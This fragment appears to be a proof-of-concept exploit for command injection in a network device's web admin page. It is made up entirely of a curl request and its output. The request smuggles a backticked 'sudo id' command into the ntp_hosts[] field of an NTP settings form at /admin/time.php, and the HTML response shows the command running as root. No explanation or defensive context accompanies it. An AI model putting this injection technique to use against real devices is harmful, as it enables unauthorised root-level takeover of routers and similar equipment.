<input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
---
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>